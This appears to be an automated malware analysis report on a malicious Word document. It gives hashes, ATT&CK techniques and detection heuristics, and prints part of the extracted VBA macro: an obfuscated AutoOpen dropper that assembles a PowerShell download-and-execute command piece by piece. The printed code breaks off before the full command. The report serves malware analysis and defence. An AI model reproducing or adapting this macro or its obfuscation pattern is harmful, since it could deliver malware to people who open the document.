Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 062dc3e1065d2843…

MALICIOUS

Office (OLE)

Size: 354.0 KB
Created: 2018-10-03 04:08:00
Authoring application: Microsoft Office Word
First seen: 2018-10-09
MD5: 3fc2f22e0741426e69357afdd8b47b71
SHA-1: cd47ef8451e045c6c87840752a7b3b2baa4bedc6
SHA-256: 062dc3e1065d2843ec7ec25900ed2572e426dbcbad94365415dfa651d0d22617
Risk Score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The file contains a VBA macro with an AutoOpen function, which is a common technique for malicious Office documents. The macro uses Shell() and CreateObject() calls, and appears to construct and execute obfuscated PowerShell commands. This suggests the document is designed to download and execute a secondary payload, consistent with a dropper or downloader malware.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-7151905-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7151905-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
  • CreateObject call (high) OLE_VBA_CREATEOBJ
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 63005 bytes
SHA-256: 3e88cfac7c5544366c08c3003a31764c445de82acb41089724c3972cc40947a4

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function kkerk()
MsgBox ""
End Function
Sub AutoOpen()
Const orrdmuu = True
Const kduelm = True
Const iiuiunf = False
Const rbiyu = True
Const inzctkfvi = True
Const iq_mlnzg = False

If 2143 <= 1217 Then
Const euirfws = True
Const tage = True
Const iauytu = False
Else
rvpiai = "$idvrck"
End If
Select Case 48 - 65
Case -17
gbzny = "whmxeuoiieqrrn50='Pol';"
rvpiai = aozxakqua99 + rvpiai + gbzny
End Select
Select Case "c_hfvrtiwe"
Case 15220
Const af_yzc = False
Case 3127
Const ibfxxc_l = False
Const eqreyqu = True
Case "c_hfvrtiwe"
rvpiai = ayeae + rvpiai + "$uvredayyjp_ulwyaz='ypa';$o_hga" + ctowpyy
End Select
Select Case 13 - 38
Case -25
rvpiai = ncena + rvpiai + "i_zlraqiouliuo='orma" + ubvjir
End Select
Const rh_lfut = False

Select Case 73 - 30
Case 43
fg_yaevdgm = rvpiai + fddma
Const iiye = False
Const ef_gsi = True
Const yueetjtp = True
fg_yaevdgm = fg_yaevdgm + "t ';$ycsbsfcdghdmokputmvmojfql" + oxryodge
Case wrank_aytha
Const zggzul = False
Const wvo_ycmqi = True
Const tnh_ynnxlq = True
End Select
Select Case 79 + 83
Case 162
tjbmmayft57 = fg_yaevdgm
tjbmmayft57 = tjbmmayft57 + "a76=').Dow';$wditaagoo_zyftoo_wdemho='s;Star"
Case 25611
Const giacc = False
End Select
If 6616 <= 11272 Then
e_eoenh = Environ("SystemRoot")
ElseIf 1413 >= 5227 Then
Const i_yrmwu = False
Const addqmxm = False
Const juuytj = False
Const yyaddai = False
Const gciqy = True
Const dfxdfi = False
Const igqmf = True
Else
Const ecka = False
Const sqshye_mzdb0 = True
Const rkce_ype = True
End If
Select Case 74 + 93
Case 167
iarrma = tjbmmayft57 + ewxmfvo
iarrma = asyiioea + iarrma + "t';$ekhuzzzpp" + jc_duthrzy
Case 13748
Const dhiogccf = True
Case argkqzoo
Const yhhob = True
End Select
Const i_ioi = True

Select Case "qiybnt"
Case xayfkhfu
Const lgpayh = True
Const zjakbkg = True
Case nohmhy
Const eduu = True
Case "qiybnt"
zdi_wupp = yidsuvdy00 + iarrma + uloxys_yu
Const piiuoph = True
itnyyajo35 = "_lwpxdaa_fcij"
Const eemcdi = False
zdi_wupp = zdi_wupp + itnyyajo35
End Select
Const owvyty = True

Select Case "ibbvylk"
Case 30661
Const ooyzvye = False
Case dr_gg
Const zvuyjti_h = False
Case "ibbvylk"
nxqwleyu3 = "piou_ulyb_x='%s;';$"
Const efvjqkqbgw = True
zdi_wupp = zdi_wupp + nxqwleyu3
End Select
Const bymdwqpty10 = True

Select Case "niwcrtiye"
Case "niwcrtiye"
uauy = "onsjfeqf_ot_bblln='le(';$eh"
Const vloecsvtkr = False
zdi_wupp = zdi_wupp + uauy + klzno
Case 31470
Const m_iqoa = False
Const hxfyuiu = True
Case jzmskdmaxnt
Const wgwheycs = True
Const zyao = False
End Select
Const iesmeo = True

If 607 >= -1100 Then
e_eoenh = e_eoenh + "\sy"
End If
Const o_igsgu9 = False

Select Case 42 - 96
Case -54
zdi_wupp = avgeezmiyu + zdi_wupp + "zlaih_usvvioarr='ex';$og" + y_ieoh
End Select
Const iaojckh = True

Select Case 11 + 13
Case 24
tooksqu = zdi_wupp
uair = "mxjukdlgtoaoby4='stem.'"
tooksqu = tooksqu + uair
End Select
Const y_sxi = True

If 54 * 47 = 2538 Then
yaayvyde = e_eoenh
Const ebejvy4 = False
fdpfmdz_aan = "stem3"
yaayvyde = yaayvyde + fdpfmdz_aan
End If
If 60 - 11 = 49 Then
pcwedt = pgozm + tooksqu
Const sjlbah = True
ieiappdfu = ";$efxks_euiuuoyu_e_kjdhowyzme='m"
pcwedt = vuukdm + pcwedt + ieiappdfu
Else
Const wehb = False
Const vnltkqpvu = True
Const yqah_e_x = False
End If
Const pohcf = False
Const vlnqocz = True

If 3871 < 1271 Then
Const looo = False
Const uzg_iyn = True
Const wbbnual = False
Const sie_igjg = True
ElseIf 5501 >= 6987 Then
Const yckuie = True
Const oiauqny = False
Const viqqk = True
Else
Dim wamstcvzj
wamstcvzj = "2\Wi"
yaayvyde = yaayvyde + wamstcvzj
End If
Const yyaeqkm = False

If 5212 > 7444 Then
Const ewfqpkl = True
... (truncated)